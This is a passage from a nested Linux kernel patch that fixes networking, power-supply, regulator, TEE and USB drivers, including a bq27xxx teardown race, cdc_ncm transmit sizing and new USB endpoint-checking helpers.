++	 * case it is initialized twice, some pointers inside the queue system
++	 * in HW will get corrupted and then after a while the queue system gets
++	 * full and no traffic is passing through the switch. The issue is seen
++	 * when loading and unloading the driver and sending traffic through the
++	 * switch.
++	 */
++	if (lan_rd(lan966x, SYS_RESET_CFG) & SYS_RESET_CFG_CORE_ENA)
++		return 0;
++
+ 	lan_wr(SYS_RESET_CFG_CORE_ENA_SET(0), lan966x, SYS_RESET_CFG);
+ 	lan_wr(SYS_RAM_INIT_RAM_INIT_SET(1), lan966x, SYS_RAM_INIT);
+ 	ret = readx_poll_timeout(lan966x_ram_init, lan966x,
+diff --git a/drivers/net/ethernet/nvidia/forcedeth.c b/drivers/net/ethernet/nvidia/forcedeth.c
+index daa028729d444..486cbc8ab2242 100644
+--- a/drivers/net/ethernet/nvidia/forcedeth.c
++++ b/drivers/net/ethernet/nvidia/forcedeth.c
+@@ -6138,6 +6138,7 @@ static int nv_probe(struct pci_dev *pci_dev, const struct pci_device_id *id)
+ 	return 0;
+ 
+ out_error:
++	nv_mgmt_release_sema(dev);
+ 	if (phystate_orig)
+ 		writel(phystate|NVREG_ADAPTCTL_RUNNING, base + NvRegAdapterControl);
+ out_freering:
+diff --git a/drivers/net/phy/mscc/mscc_main.c b/drivers/net/phy/mscc/mscc_main.c
+index 8a13b1ad9a330..f778e4f8b5080 100644
+--- a/drivers/net/phy/mscc/mscc_main.c
++++ b/drivers/net/phy/mscc/mscc_main.c
+@@ -2664,6 +2664,7 @@ static struct phy_driver vsc85xx_driver[] = {
+ module_phy_driver(vsc85xx_driver);
+ 
+ static struct mdio_device_id __maybe_unused vsc85xx_tbl[] = {
++	{ PHY_ID_VSC8502, 0xfffffff0, },
+ 	{ PHY_ID_VSC8504, 0xfffffff0, },
+ 	{ PHY_ID_VSC8514, 0xfffffff0, },
+ 	{ PHY_ID_VSC8530, 0xfffffff0, },
+diff --git a/drivers/net/team/team.c b/drivers/net/team/team.c
+index 62ade69295a94..b524bd374d685 100644
+--- a/drivers/net/team/team.c
++++ b/drivers/net/team/team.c
+@@ -1629,6 +1629,7 @@ static int team_init(struct net_device *dev)
+ 
+ 	team->dev = dev;
+ 	team_set_no_mode(team);
++	team->notifier_ctx = false;
+ 
+ 	team->pcpu_stats = netdev_alloc_pcpu_stats(struct team_pcpu_stats);
+ 	if (!team->pcpu_stats)
+@@ -3022,7 +3023,11 @@ static int team_device_event(struct notifier_block *unused,
+ 		team_del_slave(port->team->dev, dev);
+ 		break;
+ 	case NETDEV_FEAT_CHANGE:
+-		team_compute_features(port->team);
++		if (!port->team->notifier_ctx) {
++			port->team->notifier_ctx = true;
++			team_compute_features(port->team);
++			port->team->notifier_ctx = false;
++		}
+ 		break;
+ 	case NETDEV_PRECHANGEMTU:
+ 		/* Forbid to change mtu of underlaying device */
+diff --git a/drivers/net/usb/cdc_ncm.c b/drivers/net/usb/cdc_ncm.c
+index 0897fdb6254b8..789e3647f9795 100644
+--- a/drivers/net/usb/cdc_ncm.c
++++ b/drivers/net/usb/cdc_ncm.c
+@@ -180,9 +180,12 @@ static u32 cdc_ncm_check_tx_max(struct usbnet *dev, u32 new_tx)
+ 	else
+ 		min = ctx->max_datagram_size + ctx->max_ndp_size + sizeof(struct usb_cdc_ncm_nth32);
+ 
+-	max = min_t(u32, CDC_NCM_NTB_MAX_SIZE_TX, le32_to_cpu(ctx->ncm_parm.dwNtbOutMaxSize));
+-	if (max == 0)
++	if (le32_to_cpu(ctx->ncm_parm.dwNtbOutMaxSize) == 0)
+ 		max = CDC_NCM_NTB_MAX_SIZE_TX; /* dwNtbOutMaxSize not set */
++	else
++		max = clamp_t(u32, le32_to_cpu(ctx->ncm_parm.dwNtbOutMaxSize),
++			      USB_CDC_NCM_NTB_MIN_OUT_SIZE,
++			      CDC_NCM_NTB_MAX_SIZE_TX);
+ 
+ 	/* some devices set dwNtbOutMaxSize too low for the above default */
+ 	min = min(min, max);
+@@ -1243,6 +1246,9 @@ cdc_ncm_fill_tx_frame(struct usbnet *dev, struct sk_buff *skb, __le32 sign)
+ 			 * further.
+ 			 */
+ 			if (skb_out == NULL) {
++				/* If even the smallest allocation fails, abort. */
++				if (ctx->tx_curr_size == USB_CDC_NCM_NTB_MIN_OUT_SIZE)
++					goto alloc_failed;
+ 				ctx->tx_low_mem_max_cnt = min(ctx->tx_low_mem_max_cnt + 1,
+ 							      (unsigned)CDC_NCM_LOW_MEM_MAX_CNT);
+ 				ctx->tx_low_mem_val = ctx->tx_low_mem_max_cnt;
+@@ -1261,13 +1267,8 @@ cdc_ncm_fill_tx_frame(struct usbnet *dev, struct sk_buff *skb, __le32 sign)
+ 			skb_out = alloc_skb(ctx->tx_curr_size, GFP_ATOMIC);
+ 
+ 			/* No allocation possible so we will abort */
+-			if (skb_out == NULL) {
+-				if (skb != NULL) {
+-					dev_kfree_skb_any(skb);
+-					dev->net->stats.tx_dropped++;
+-				}
+-				goto exit_no_skb;
+-			}
++			if (!skb_out)
++				goto alloc_failed;
+ 			ctx->tx_low_mem_val--;
+ 		}
+ 		if (ctx->is_ndp16) {
+@@ -1460,6 +1461,11 @@ cdc_ncm_fill_tx_frame(struct usbnet *dev, struct sk_buff *skb, __le32 sign)
+ 
+ 	return skb_out;
+ 
++alloc_failed:
++	if (skb) {
++		dev_kfree_skb_any(skb);
++		dev->net->stats.tx_dropped++;
++	}
+ exit_no_skb:
+ 	/* Start timer, if there is a remaining non-empty skb */
+ 	if (ctx->tx_curr_skb != NULL && n > 0)
+diff --git a/drivers/platform/mellanox/mlxbf-pmc.c b/drivers/platform/mellanox/mlxbf-pmc.c
+index c2c9b0d3244cb..be967d797c28e 100644
+--- a/drivers/platform/mellanox/mlxbf-pmc.c
++++ b/drivers/platform/mellanox/mlxbf-pmc.c
+@@ -1348,9 +1348,8 @@ static int mlxbf_pmc_map_counters(struct device *dev)
+ 
+ 	for (i = 0; i < pmc->total_blocks; ++i) {
+ 		if (strstr(pmc->block_name[i], "tile")) {
+-			ret = sscanf(pmc->block_name[i], "tile%d", &tile_num);
+-			if (ret < 0)
+-				return ret;
++			if (sscanf(pmc->block_name[i], "tile%d", &tile_num) != 1)
++				return -EINVAL;
+ 
+ 			if (tile_num >= pmc->tile_count)
+ 				continue;
+diff --git a/drivers/platform/x86/hp/hp-wmi.c b/drivers/platform/x86/hp/hp-wmi.c
+index 94af7d398a1bf..3bacee2b8d521 100644
+--- a/drivers/platform/x86/hp/hp-wmi.c
++++ b/drivers/platform/x86/hp/hp-wmi.c
+@@ -552,7 +552,7 @@ static int __init hp_wmi_enable_hotkeys(void)
+ 
+ static int hp_wmi_set_block(void *data, bool blocked)
+ {
+-	enum hp_wmi_radio r = (enum hp_wmi_radio) data;
++	enum hp_wmi_radio r = (long)data;
+ 	int query = BIT(r + 8) | ((!blocked) << r);
+ 	int ret;
+ 
+diff --git a/drivers/platform/x86/intel/ifs/load.c b/drivers/platform/x86/intel/ifs/load.c
+index d056617ddc853..3e52b4eb14505 100644
+--- a/drivers/platform/x86/intel/ifs/load.c
++++ b/drivers/platform/x86/intel/ifs/load.c
+@@ -154,7 +154,7 @@ static int scan_chunks_sanity_check(struct device *dev)
+ 			continue;
+ 		reinit_completion(&ifs_done);
+ 		local_work.dev = dev;
+-		INIT_WORK(&local_work.w, copy_hashes_authenticate_chunks);
++		INIT_WORK_ONSTACK(&local_work.w, copy_hashes_authenticate_chunks);
+ 		schedule_work_on(cpu, &local_work.w);
+ 		wait_for_completion(&ifs_done);
+ 		if (ifsd->loading_error)
+diff --git a/drivers/platform/x86/intel/speed_select_if/isst_if_common.c b/drivers/platform/x86/intel/speed_select_if/isst_if_common.c
+index fd102678c75f6..f6b32d31c5110 100644
+--- a/drivers/platform/x86/intel/speed_select_if/isst_if_common.c
++++ b/drivers/platform/x86/intel/speed_select_if/isst_if_common.c
+@@ -294,14 +294,13 @@ struct isst_if_pkg_info {
+ static struct isst_if_cpu_info *isst_cpu_info;
+ static struct isst_if_pkg_info *isst_pkg_info;
+ 
+-#define ISST_MAX_PCI_DOMAINS	8
+-
+ static struct pci_dev *_isst_if_get_pci_dev(int cpu, int bus_no, int dev, int fn)
+ {
+ 	struct pci_dev *matched_pci_dev = NULL;
+ 	struct pci_dev *pci_dev = NULL;
++	struct pci_dev *_pci_dev = NULL;
+ 	int no_matches = 0, pkg_id;
+-	int i, bus_number;
++	int bus_number;
+ 
+ 	if (bus_no < 0 || bus_no >= ISST_MAX_BUS_NUMBER || cpu < 0 ||
+ 	    cpu >= nr_cpu_ids || cpu >= num_possible_cpus())
+@@ -313,12 +312,11 @@ static struct pci_dev *_isst_if_get_pci_dev(int cpu, int bus_no, int dev, int fn
+ 	if (bus_number < 0)
+ 		return NULL;
+ 
+-	for (i = 0; i < ISST_MAX_PCI_DOMAINS; ++i) {
+-		struct pci_dev *_pci_dev;
++	for_each_pci_dev(_pci_dev) {
+ 		int node;
+ 
+-		_pci_dev = pci_get_domain_bus_and_slot(i, bus_number, PCI_DEVFN(dev, fn));
+-		if (!_pci_dev)
++		if (_pci_dev->bus->number != bus_number ||
++		    _pci_dev->devfn != PCI_DEVFN(dev, fn))
+ 			continue;
+ 
+ 		++no_matches;
+diff --git a/drivers/power/supply/axp288_fuel_gauge.c b/drivers/power/supply/axp288_fuel_gauge.c
+index 05f4131784629..3be6f3b10ea42 100644
+--- a/drivers/power/supply/axp288_fuel_gauge.c
++++ b/drivers/power/supply/axp288_fuel_gauge.c
+@@ -507,7 +507,7 @@ static void fuel_gauge_external_power_changed(struct power_supply *psy)
+ 	mutex_lock(&info->lock);
+ 	info->valid = 0; /* Force updating of the cached registers */
+ 	mutex_unlock(&info->lock);
+-	power_supply_changed(info->bat);
++	power_supply_changed(psy);
+ }
+ 
+ static struct power_supply_desc fuel_gauge_desc = {
+diff --git a/drivers/power/supply/bq24190_charger.c b/drivers/power/supply/bq24190_charger.c
+index d7400b56820d6..0d3db227b63a7 100644
+--- a/drivers/power/supply/bq24190_charger.c
++++ b/drivers/power/supply/bq24190_charger.c
+@@ -1262,6 +1262,7 @@ static void bq24190_input_current_limit_work(struct work_struct *work)
+ 	bq24190_charger_set_property(bdi->charger,
+ 				     POWER_SUPPLY_PROP_INPUT_CURRENT_LIMIT,
+ 				     &val);
++	power_supply_changed(bdi->charger);
+ }
+ 
+ /* Sync the input-current-limit with our parent supply (if we have one) */
+diff --git a/drivers/power/supply/bq25890_charger.c b/drivers/power/supply/bq25890_charger.c
+index 0e15302b8df22..ee6e28f1d52dc 100644
+--- a/drivers/power/supply/bq25890_charger.c
++++ b/drivers/power/supply/bq25890_charger.c
+@@ -650,7 +650,7 @@ static void bq25890_charger_external_power_changed(struct power_supply *psy)
+ 	if (bq->chip_version != BQ25892)
+ 		return;
+ 
+-	ret = power_supply_get_property_from_supplier(bq->charger,
++	ret = power_supply_get_property_from_supplier(psy,
+ 						      POWER_SUPPLY_PROP_USB_TYPE,
+ 						      &val);
+ 	if (ret)
+@@ -675,6 +675,7 @@ static void bq25890_charger_external_power_changed(struct power_supply *psy)
+ 	}
+ 
+ 	bq25890_field_write(bq, F_IINLIM, input_current_limit);
++	power_supply_changed(psy);
+ }
+ 
+ static int bq25890_get_chip_state(struct bq25890_device *bq,
+@@ -973,6 +974,8 @@ static void bq25890_pump_express_work(struct work_struct *data)
+ 	dev_info(bq->dev, "Hi-voltage charging requested, input voltage is %d mV\n",
+ 		 voltage);
+ 
++	power_supply_changed(bq->charger);
++
+ 	return;
+ error_print:
+ 	bq25890_field_write(bq, F_PUMPX_EN, 0);
+diff --git a/drivers/power/supply/bq27xxx_battery.c b/drivers/power/supply/bq27xxx_battery.c
+index 8bf048fbd36a2..17a09d103a59c 100644
+--- a/drivers/power/supply/bq27xxx_battery.c
++++ b/drivers/power/supply/bq27xxx_battery.c
+@@ -1761,60 +1761,6 @@ static int bq27xxx_battery_read_health(struct bq27xxx_device_info *di)
+ 	return POWER_SUPPLY_HEALTH_GOOD;
+ }
+ 
+-void bq27xxx_battery_update(struct bq27xxx_device_info *di)
+-{
+-	struct bq27xxx_reg_cache cache = {0, };
+-	bool has_singe_flag = di->opts & BQ27XXX_O_ZERO;
+-
+-	cache.flags = bq27xxx_read(di, BQ27XXX_REG_FLAGS, has_singe_flag);
+-	if ((cache.flags & 0xff) == 0xff)
+-		cache.flags = -1; /* read error */
+-	if (cache.flags >= 0) {
+-		cache.temperature = bq27xxx_battery_read_temperature(di);
+-		if (di->regs[BQ27XXX_REG_TTE] != INVALID_REG_ADDR)
+-			cache.time_to_empty = bq27xxx_battery_read_time(di, BQ27XXX_REG_TTE);
+-		if (di->regs[BQ27XXX_REG_TTECP] != INVALID_REG_ADDR)
+-			cache.time_to_empty_avg = bq27xxx_battery_read_time(di, BQ27XXX_REG_TTECP);
+-		if (di->regs[BQ27XXX_REG_TTF] != INVALID_REG_ADDR)
+-			cache.time_to_full = bq27xxx_battery_read_time(di, BQ27XXX_REG_TTF);
+-
+-		cache.charge_full = bq27xxx_battery_read_fcc(di);
+-		cache.capacity = bq27xxx_battery_read_soc(di);
+-		if (di->regs[BQ27XXX_REG_AE] != INVALID_REG_ADDR)
+-			cache.energy = bq27xxx_battery_read_energy(di);
+-		di->cache.flags = cache.flags;
+-		cache.health = bq27xxx_battery_read_health(di);
+-		if (di->regs[BQ27XXX_REG_CYCT] != INVALID_REG_ADDR)
+-			cache.cycle_count = bq27xxx_battery_read_cyct(di);
+-
+-		/* We only have to read charge design full once */
+-		if (di->charge_design_full <= 0)
+-			di->charge_design_full = bq27xxx_battery_read_dcap(di);
+-	}
+-
+-	if ((di->cache.capacity != cache.capacity) ||
+-	    (di->cache.flags != cache.flags))
+-		power_supply_changed(di->bat);
+-
+-	if (memcmp(&di->cache, &cache, sizeof(cache)) != 0)
+-		di->cache = cache;
+-
+-	di->last_update = jiffies;
+-}
+-EXPORT_SYMBOL_GPL(bq27xxx_battery_update);
+-
+-static void bq27xxx_battery_poll(struct work_struct *work)
+-{
+-	struct bq27xxx_device_info *di =
+-			container_of(work, struct bq27xxx_device_info,
+-				     work.work);
+-
+-	bq27xxx_battery_update(di);
+-
+-	if (poll_interval > 0)
+-		schedule_delayed_work(&di->work, poll_interval * HZ);
+-}
+-
+ static bool bq27xxx_battery_is_full(struct bq27xxx_device_info *di, int flags)
+ {
+ 	if (di->opts & BQ27XXX_O_ZERO)
+@@ -1833,7 +1779,8 @@ static bool bq27xxx_battery_is_full(struct bq27xxx_device_info *di, int flags)
+ static int bq27xxx_battery_current_and_status(
+ 	struct bq27xxx_device_info *di,
+ 	union power_supply_propval *val_curr,
+-	union power_supply_propval *val_status)
++	union power_supply_propval *val_status,
++	struct bq27xxx_reg_cache *cache)
+ {
+ 	bool single_flags = (di->opts & BQ27XXX_O_ZERO);
+ 	int curr;
+@@ -1845,10 +1792,14 @@ static int bq27xxx_battery_current_and_status(
+ 		return curr;
+ 	}
+ 
+-	flags = bq27xxx_read(di, BQ27XXX_REG_FLAGS, single_flags);
+-	if (flags < 0) {
+-		dev_err(di->dev, "error reading flags\n");
+-		return flags;
++	if (cache) {
++		flags = cache->flags;
++	} else {
++		flags = bq27xxx_read(di, BQ27XXX_REG_FLAGS, single_flags);
++		if (flags < 0) {
++			dev_err(di->dev, "error reading flags\n");
++			return flags;
++		}
+ 	}
+ 
+ 	if (di->opts & BQ27XXX_O_ZERO) {
+@@ -1883,6 +1834,78 @@ static int bq27xxx_battery_current_and_status(
+ 	return 0;
+ }
+ 
++static void bq27xxx_battery_update_unlocked(struct bq27xxx_device_info *di)
++{
++	union power_supply_propval status = di->last_status;
++	struct bq27xxx_reg_cache cache = {0, };
++	bool has_singe_flag = di->opts & BQ27XXX_O_ZERO;
++
++	cache.flags = bq27xxx_read(di, BQ27XXX_REG_FLAGS, has_singe_flag);
++	if ((cache.flags & 0xff) == 0xff)
++		cache.flags = -1; /* read error */
++	if (cache.flags >= 0) {
++		cache.temperature = bq27xxx_battery_read_temperature(di);
++		if (di->regs[BQ27XXX_REG_TTE] != INVALID_REG_ADDR)
++			cache.time_to_empty = bq27xxx_battery_read_time(di, BQ27XXX_REG_TTE);
++		if (di->regs[BQ27XXX_REG_TTECP] != INVALID_REG_ADDR)
++			cache.time_to_empty_avg = bq27xxx_battery_read_time(di, BQ27XXX_REG_TTECP);
++		if (di->regs[BQ27XXX_REG_TTF] != INVALID_REG_ADDR)
++			cache.time_to_full = bq27xxx_battery_read_time(di, BQ27XXX_REG_TTF);
++
++		cache.charge_full = bq27xxx_battery_read_fcc(di);
++		cache.capacity = bq27xxx_battery_read_soc(di);
++		if (di->regs[BQ27XXX_REG_AE] != INVALID_REG_ADDR)
++			cache.energy = bq27xxx_battery_read_energy(di);
++		di->cache.flags = cache.flags;
++		cache.health = bq27xxx_battery_read_health(di);
++		if (di->regs[BQ27XXX_REG_CYCT] != INVALID_REG_ADDR)
++			cache.cycle_count = bq27xxx_battery_read_cyct(di);
++
++		/*
++		 * On gauges with signed current reporting the current must be
++		 * checked to detect charging <-> discharging status changes.
++		 */
++		if (!(di->opts & BQ27XXX_O_ZERO))
++			bq27xxx_battery_current_and_status(di, NULL, &status, &cache);
++
++		/* We only have to read charge design full once */
++		if (di->charge_design_full <= 0)
++			di->charge_design_full = bq27xxx_battery_read_dcap(di);
++	}
++
++	if ((di->cache.capacity != cache.capacity) ||
++	    (di->cache.flags != cache.flags) ||
++	    (di->last_status.intval != status.intval)) {
++		di->last_status.intval = status.intval;
++		power_supply_changed(di->bat);
++	}
++
++	if (memcmp(&di->cache, &cache, sizeof(cache)) != 0)
++		di->cache = cache;
++
++	di->last_update = jiffies;
++
++	if (!di->removed && poll_interval > 0)
++		mod_delayed_work(system_wq, &di->work, poll_interval * HZ);
++}
++
++void bq27xxx_battery_update(struct bq27xxx_device_info *di)
++{
++	mutex_lock(&di->lock);
++	bq27xxx_battery_update_unlocked(di);
++	mutex_unlock(&di->lock);
++}
++EXPORT_SYMBOL_GPL(bq27xxx_battery_update);
++
++static void bq27xxx_battery_poll(struct work_struct *work)
++{
++	struct bq27xxx_device_info *di =
++			container_of(work, struct bq27xxx_device_info,
++				     work.work);
++
++	bq27xxx_battery_update(di);
++}
++
+ /*
+  * Get the average power in µW
+  * Return < 0 if something fails.
+@@ -1985,10 +2008,8 @@ static int bq27xxx_battery_get_property(struct power_supply *psy,
+ 	struct bq27xxx_device_info *di = power_supply_get_drvdata(psy);
+ 
+ 	mutex_lock(&di->lock);
+-	if (time_is_before_jiffies(di->last_update + 5 * HZ)) {
+-		cancel_delayed_work_sync(&di->work);
+-		bq27xxx_battery_poll(&di->work.work);
+-	}
++	if (time_is_before_jiffies(di->last_update + 5 * HZ))
++		bq27xxx_battery_update_unlocked(di);
+ 	mutex_unlock(&di->lock);
+ 
+ 	if (psp != POWER_SUPPLY_PROP_PRESENT && di->cache.flags < 0)
+@@ -1996,7 +2017,7 @@ static int bq27xxx_battery_get_property(struct power_supply *psy,
+ 
+ 	switch (psp) {
+ 	case POWER_SUPPLY_PROP_STATUS:
+-		ret = bq27xxx_battery_current_and_status(di, NULL, val);
++		ret = bq27xxx_battery_current_and_status(di, NULL, val, NULL);
+ 		break;
+ 	case POWER_SUPPLY_PROP_VOLTAGE_NOW:
+ 		ret = bq27xxx_battery_voltage(di, val);
+@@ -2005,7 +2026,7 @@ static int bq27xxx_battery_get_property(struct power_supply *psy,
+ 		val->intval = di->cache.flags < 0 ? 0 : 1;
+ 		break;
+ 	case POWER_SUPPLY_PROP_CURRENT_NOW:
+-		ret = bq27xxx_battery_current_and_status(di, val, NULL);
++		ret = bq27xxx_battery_current_and_status(di, val, NULL, NULL);
+ 		break;
+ 	case POWER_SUPPLY_PROP_CAPACITY:
+ 		ret = bq27xxx_simple_value(di->cache.capacity, val);
+@@ -2078,8 +2099,8 @@ static void bq27xxx_external_power_changed(struct power_supply *psy)
+ {
+ 	struct bq27xxx_device_info *di = power_supply_get_drvdata(psy);
+ 
+-	cancel_delayed_work_sync(&di->work);
+-	schedule_delayed_work(&di->work, 0);
++	/* After charger plug in/out wait 0.5s for things to stabilize */
++	mod_delayed_work(system_wq, &di->work, HZ / 2);
+ }
+ 
+ int bq27xxx_battery_setup(struct bq27xxx_device_info *di)
+@@ -2127,22 +2148,18 @@ EXPORT_SYMBOL_GPL(bq27xxx_battery_setup);
+ 
+ void bq27xxx_battery_teardown(struct bq27xxx_device_info *di)
+ {
+-	/*
+-	 * power_supply_unregister call bq27xxx_battery_get_property which
+-	 * call bq27xxx_battery_poll.
+-	 * Make sure that bq27xxx_battery_poll will not call
+-	 * schedule_delayed_work again after unregister (which cause OOPS).
+-	 */
+-	poll_interval = 0;
+-
+-	cancel_delayed_work_sync(&di->work);
+-
+-	power_supply_unregister(di->bat);
+-
+ 	mutex_lock(&bq27xxx_list_lock);
+ 	list_del(&di->list);
+ 	mutex_unlock(&bq27xxx_list_lock);
+ 
++	/* Set removed to avoid bq27xxx_battery_update() re-queuing the work */
++	mutex_lock(&di->lock);
++	di->removed = true;
++	mutex_unlock(&di->lock);
++
++	cancel_delayed_work_sync(&di->work);
++
++	power_supply_unregister(di->bat);
+ 	mutex_destroy(&di->lock);
+ }
+ EXPORT_SYMBOL_GPL(bq27xxx_battery_teardown);
+diff --git a/drivers/power/supply/bq27xxx_battery_i2c.c b/drivers/power/supply/bq27xxx_battery_i2c.c
+index 94b00bb89c177..0713a52a25107 100644
+--- a/drivers/power/supply/bq27xxx_battery_i2c.c
++++ b/drivers/power/supply/bq27xxx_battery_i2c.c
+@@ -179,7 +179,7 @@ static int bq27xxx_battery_i2c_probe(struct i2c_client *client,
+ 	i2c_set_clientdata(client, di);
+ 
+ 	if (client->irq) {
+-		ret = devm_request_threaded_irq(&client->dev, client->irq,
++		ret = request_threaded_irq(client->irq,
+ 				NULL, bq27xxx_battery_irq_handler_thread,
+ 				IRQF_ONESHOT,
+ 				di->name, di);
+@@ -209,6 +209,7 @@ static void bq27xxx_battery_i2c_remove(struct i2c_client *client)
+ {
+ 	struct bq27xxx_device_info *di = i2c_get_clientdata(client);
+ 
++	free_irq(client->irq, di);
+ 	bq27xxx_battery_teardown(di);
+ 
+ 	mutex_lock(&battery_mutex);
+diff --git a/drivers/power/supply/mt6360_charger.c b/drivers/power/supply/mt6360_charger.c
+index 3abaa72e06683..f1248faf59058 100644
+--- a/drivers/power/supply/mt6360_charger.c
++++ b/drivers/power/supply/mt6360_charger.c
+@@ -799,7 +799,9 @@ static int mt6360_charger_probe(struct platform_device *pdev)
+ 	mci->vinovp = 6500000;
+ 	mutex_init(&mci->chgdet_lock);
+ 	platform_set_drvdata(pdev, mci);
+-	devm_work_autocancel(&pdev->dev, &mci->chrdet_work, mt6360_chrdet_work);
++	ret = devm_work_autocancel(&pdev->dev, &mci->chrdet_work, mt6360_chrdet_work);
++	if (ret)
++		return dev_err_probe(&pdev->dev, ret, "Failed to set delayed work\n");
+ 
+ 	ret = device_property_read_u32(&pdev->dev, "richtek,vinovp-microvolt", &mci->vinovp);
+ 	if (ret)
+diff --git a/drivers/power/supply/power_supply_leds.c b/drivers/power/supply/power_supply_leds.c
+index d69880cc35931..b7a2778f878de 100644
+--- a/drivers/power/supply/power_supply_leds.c
++++ b/drivers/power/supply/power_supply_leds.c
+@@ -34,8 +34,9 @@ static void power_supply_update_bat_leds(struct power_supply *psy)
+ 		led_trigger_event(psy->charging_full_trig, LED_FULL);
+ 		led_trigger_event(psy->charging_trig, LED_OFF);
+ 		led_trigger_event(psy->full_trig, LED_FULL);
+-		led_trigger_event(psy->charging_blink_full_solid_trig,
+-			LED_FULL);
++		/* Going from blink to LED on requires a LED_OFF event to stop blink */
++		led_trigger_event(psy->charging_blink_full_solid_trig, LED_OFF);
++		led_trigger_event(psy->charging_blink_full_solid_trig, LED_FULL);
+ 		break;
+ 	case POWER_SUPPLY_STATUS_CHARGING:
+ 		led_trigger_event(psy->charging_full_trig, LED_FULL);
+diff --git a/drivers/power/supply/sbs-charger.c b/drivers/power/supply/sbs-charger.c
+index b08f7d0c41815..bc927c0ddd343 100644
+--- a/drivers/power/supply/sbs-charger.c
++++ b/drivers/power/supply/sbs-charger.c
+@@ -24,7 +24,7 @@
+ #define SBS_CHARGER_REG_STATUS			0x13
+ #define SBS_CHARGER_REG_ALARM_WARNING		0x16
+ 
+-#define SBS_CHARGER_STATUS_CHARGE_INHIBITED	BIT(1)
++#define SBS_CHARGER_STATUS_CHARGE_INHIBITED	BIT(0)
+ #define SBS_CHARGER_STATUS_RES_COLD		BIT(9)
+ #define SBS_CHARGER_STATUS_RES_HOT		BIT(10)
+ #define SBS_CHARGER_STATUS_BATTERY_PRESENT	BIT(14)
+diff --git a/drivers/regulator/mt6359-regulator.c b/drivers/regulator/mt6359-regulator.c
+index de3b0462832cd..f94f87c5407ae 100644
+--- a/drivers/regulator/mt6359-regulator.c
++++ b/drivers/regulator/mt6359-regulator.c
+@@ -951,9 +951,12 @@ static int mt6359_regulator_probe(struct platform_device *pdev)
+ 	struct regulator_config config = {};
+ 	struct regulator_dev *rdev;
+ 	struct mt6359_regulator_info *mt6359_info;
+-	int i, hw_ver;
++	int i, hw_ver, ret;
++
++	ret = regmap_read(mt6397->regmap, MT6359P_HWCID, &hw_ver);
++	if (ret)
++		return ret;
+ 
+-	regmap_read(mt6397->regmap, MT6359P_HWCID, &hw_ver);
+ 	if (hw_ver >= MT6359P_CHIP_VER)
+ 		mt6359_info = mt6359p_regulators;
+ 	else
+diff --git a/drivers/regulator/pca9450-regulator.c b/drivers/regulator/pca9450-regulator.c
+index 14b7d33765162..0fcda40cefa6d 100644
+--- a/drivers/regulator/pca9450-regulator.c
++++ b/drivers/regulator/pca9450-regulator.c
+@@ -264,7 +264,7 @@ static const struct pca9450_regulator_desc pca9450a_regulators[] = {
+ 			.vsel_reg = PCA9450_REG_BUCK2OUT_DVS0,
+ 			.vsel_mask = BUCK2OUT_DVS0_MASK,
+ 			.enable_reg = PCA9450_REG_BUCK2CTRL,
+-			.enable_mask = BUCK1_ENMODE_MASK,
++			.enable_mask = BUCK2_ENMODE_MASK,
+ 			.ramp_reg = PCA9450_REG_BUCK2CTRL,
+ 			.ramp_mask = BUCK2_RAMP_MASK,
+ 			.ramp_delay_table = pca9450_dvs_buck_ramp_table,
+@@ -502,7 +502,7 @@ static const struct pca9450_regulator_desc pca9450bc_regulators[] = {
+ 			.vsel_reg = PCA9450_REG_BUCK2OUT_DVS0,
+ 			.vsel_mask = BUCK2OUT_DVS0_MASK,
+ 			.enable_reg = PCA9450_REG_BUCK2CTRL,
+-			.enable_mask = BUCK1_ENMODE_MASK,
++			.enable_mask = BUCK2_ENMODE_MASK,
+ 			.ramp_reg = PCA9450_REG_BUCK2CTRL,
+ 			.ramp_mask = BUCK2_RAMP_MASK,
+ 			.ramp_delay_table = pca9450_dvs_buck_ramp_table,
+diff --git a/drivers/tee/optee/smc_abi.c b/drivers/tee/optee/smc_abi.c
+index a1c1fa1a9c28a..e6e0428f8e7be 100644
+--- a/drivers/tee/optee/smc_abi.c
++++ b/drivers/tee/optee/smc_abi.c
+@@ -984,8 +984,10 @@ static u32 get_async_notif_value(optee_invoke_fn *invoke_fn, bool *value_valid,
+ 
+ 	invoke_fn(OPTEE_SMC_GET_ASYNC_NOTIF_VALUE, 0, 0, 0, 0, 0, 0, 0, &res);
+ 
+-	if (res.a0)
++	if (res.a0) {
++		*value_valid = false;
+ 		return 0;
++	}
+ 	*value_valid = (res.a2 & OPTEE_SMC_ASYNC_NOTIF_VALUE_VALID);
+ 	*value_pending = (res.a2 & OPTEE_SMC_ASYNC_NOTIF_VALUE_PENDING);
+ 	return res.a1;
+diff --git a/drivers/usb/core/usb.c b/drivers/usb/core/usb.c
+index a415206cab043..3500e3c94c4b8 100644
+--- a/drivers/usb/core/usb.c
++++ b/drivers/usb/core/usb.c
+@@ -206,6 +206,82 @@ int usb_find_common_endpoints_reverse(struct usb_host_interface *alt,
+ }
+ EXPORT_SYMBOL_GPL(usb_find_common_endpoints_reverse);
+ 
++/**
++ * usb_find_endpoint() - Given an endpoint address, search for the endpoint's
++ * usb_host_endpoint structure in an interface's current altsetting.
++ * @intf: the interface whose current altsetting should be searched
++ * @ep_addr: the endpoint address (number and direction) to find
++ *
++ * Search the altsetting's list of endpoints for one with the specified address.
++ *
++ * Return: Pointer to the usb_host_endpoint if found, %NULL otherwise.
++ */
++static const struct usb_host_endpoint *usb_find_endpoint(
++		const struct usb_interface *intf, unsigned int ep_addr)
++{
++	int n;
++	const struct usb_host_endpoint *ep;
++
++	n = intf->cur_altsetting->desc.bNumEndpoints;
++	ep = intf->cur_altsetting->endpoint;
++	for (; n > 0; (--n, ++ep)) {
++		if (ep->desc.bEndpointAddress == ep_addr)
++			return ep;
++	}
++	return NULL;
++}
++
++/**
++ * usb_check_bulk_endpoints - Check whether an interface's current altsetting
++ * contains a set of bulk endpoints with the given addresses.
++ * @intf: the interface whose current altsetting should be searched
++ * @ep_addrs: 0-terminated array of the endpoint addresses (number and
++ * direction) to look for
++ *
++ * Search for endpoints with the specified addresses and check their types.
++ *
++ * Return: %true if all the endpoints are found and are bulk, %false otherwise.
++ */
++bool usb_check_bulk_endpoints(
++		const struct usb_interface *intf, const u8 *ep_addrs)
++{
++	const struct usb_host_endpoint *ep;
++
++	for (; *ep_addrs; ++ep_addrs) {
++		ep = usb_find_endpoint(intf, *ep_addrs);
++		if (!ep || !usb_endpoint_xfer_bulk(&ep->desc))
++			return false;
++	}
++	return true;
++}
++EXPORT_SYMBOL_GPL(usb_check_bulk_endpoints);
++
++/**
++ * usb_check_int_endpoints - Check whether an interface's current altsetting
++ * contains a set of interrupt endpoints with the given addresses.
++ * @intf: the interface whose current altsetting should be searched
